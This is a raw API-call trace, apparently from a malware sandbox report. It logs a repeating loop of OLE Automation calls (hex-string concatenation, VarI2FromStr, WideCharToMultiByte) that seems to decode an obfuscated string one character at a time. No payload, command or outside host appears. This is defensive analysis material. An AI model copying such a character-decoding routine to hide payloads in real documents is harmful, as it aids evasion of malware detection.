VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.884] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.884] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.884] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.884] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.884] GetUserDefaultLCID () returned 0x409 [0174.884] malloc (_Size=0xa0) returned 0x11f50080 [0174.884] free (_Block=0x11f50080) [0174.884] VarBstrCat (in: bstrLeft="&H", bstrRight="b1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.885] GetUserDefaultLCID () returned 0x409 [0174.885] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.885] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.885] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.885] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.885] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.885] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.885] GetUserDefaultLCID () returned 0x409 [0174.885] malloc (_Size=0xa0) returned 0x11f50080 [0174.885] free (_Block=0x11f50080) [0174.886] VarBstrCat (in: bstrLeft="&H", bstrRight="b9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.886] GetUserDefaultLCID () returned 0x409 [0174.886] VarI2FromStr (in: strIn="&Hb9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.886] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0174.886] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.886] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.886] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.886] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.886] GetUserDefaultLCID () returned 0x409 [0174.886] malloc (_Size=0xa0) returned 0x11f50080 [0174.887] free (_Block=0x11f50080) [0174.887] VarBstrCat (in: bstrLeft="&H", bstrRight="cc", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.887] GetUserDefaultLCID () returned 0x409 [0174.887] VarI2FromStr (in: strIn="&Hcc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.888] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0174.888] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.888] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.888] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.888] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.888] GetUserDefaultLCID () returned 0x409 [0174.888] malloc (_Size=0xa0) returned 0x11f50080 [0174.888] free (_Block=0x11f50080) [0174.888] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.889] GetUserDefaultLCID () returned 0x409 [0174.889] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.889] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.889] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.889] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.889] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.889] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.889] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.889] GetUserDefaultLCID () returned 0x409 [0174.889] malloc (_Size=0xa0) returned 0x11f50080 [0174.889] free (_Block=0x11f50080) [0174.890] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.890] GetUserDefaultLCID () returned 0x409 [0174.890] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.890] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.890] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.890] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.890] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.890] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.890] GetUserDefaultLCID () returned 0x409 [0174.890] malloc (_Size=0xa0) returned 0x11f50080 [0174.891] free (_Block=0x11f50080) [0174.891] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.891] GetUserDefaultLCID () returned 0x409 [0174.891] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.891] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.891] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.891] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.891] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.891] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.892] GetUserDefaultLCID () returned 0x409 [0174.892] malloc (_Size=0xa0) returned 0x11f50080 [0174.892] free (_Block=0x11f50080) [0174.892] VarBstrCat (in: bstrLeft="&H", bstrRight="9b", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.892] GetUserDefaultLCID () returned 0x409 [0174.892] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.892] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.892] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.893] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.893] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.893] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.893] GetUserDefaultLCID () returned 0x409 [0174.893] malloc (_Size=0xa0) returned 0x11f50080 [0174.893] free (_Block=0x11f50080) [0174.893] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.893] GetUserDefaultLCID () returned 0x409 [0174.893] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.894] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.894] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.894] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.894] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.894] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.894] GetUserDefaultLCID () returned 0x409 [0174.894] malloc (_Size=0xa0) returned 0x11f50080 [0174.894] free (_Block=0x11f50080) [0174.894] VarBstrCat (in: bstrLeft="&H", bstrRight="97", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.894] GetUserDefaultLCID () returned 0x409 [0174.894] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.895] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.895] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.895] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.895] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.895] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.895] GetUserDefaultLCID () returned 0x409 [0174.895] malloc (_Size=0xa0) returned 0x11f50080 [0174.895] free (_Block=0x11f50080) [0174.896] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.896] GetUserDefaultLCID () returned 0x409 [0174.896] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.896] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.896] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.896] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.896] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.896] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.896] GetUserDefaultLCID () returned 0x409 [0174.896] malloc (_Size=0xa0) returned 0x11f50080 [0174.896] free (_Block=0x11f50080) [0174.897] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.897] GetUserDefaultLCID () returned 0x409 [0174.897] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.897] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.897] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.897] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.897] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.897] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.897] GetUserDefaultLCID () returned 0x409 [0174.897] malloc (_Size=0xa0) returned 0x11f50080 [0174.898] free (_Block=0x11f50080) [0174.898] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.898] GetUserDefaultLCID () returned 0x409 [0174.898] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.898] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.898] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.898] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.898] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.898] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.898] GetUserDefaultLCID () returned 0x409 [0174.899] malloc (_Size=0xa0) returned 0x11f50080 [0174.899] free (_Block=0x11f50080) [0174.899] VarBstrCat (in: bstrLeft="&H", bstrRight="c1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.899] GetUserDefaultLCID () returned 0x409 [0174.899] VarI2FromStr (in: strIn="&Hc1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.899] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="Q") returned 1 [0174.899] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.899] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.900] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.900] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.900] GetUserDefaultLCID () returned 0x409 [0174.900] malloc (_Size=0xa0) returned 0x11f50080 [0174.900] free (_Block=0x11f50080) [0174.900] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.900] GetUserDefaultLCID () returned 0x409 [0174.900] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.900] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.900] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.901] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.901] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.901] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.901] GetUserDefaultLCID () returned 0x409 [0174.901] malloc (_Size=0xa0) returned 0x11f50080 [0174.901] free (_Block=0x11f50080) [0174.901] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.901] GetUserDefaultLCID () returned 0x409 [0174.901] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.901] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.902] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.902] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.902] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.902] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.902] GetUserDefaultLCID () returned 0x409 [0174.902] malloc (_Size=0xa0) returned 0x11f50080 [0174.902] free (_Block=0x11f50080) [0174.902] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.902] GetUserDefaultLCID () returned 0x409 [0174.907] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.907] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.908] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.908] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.908] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.908] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.908] 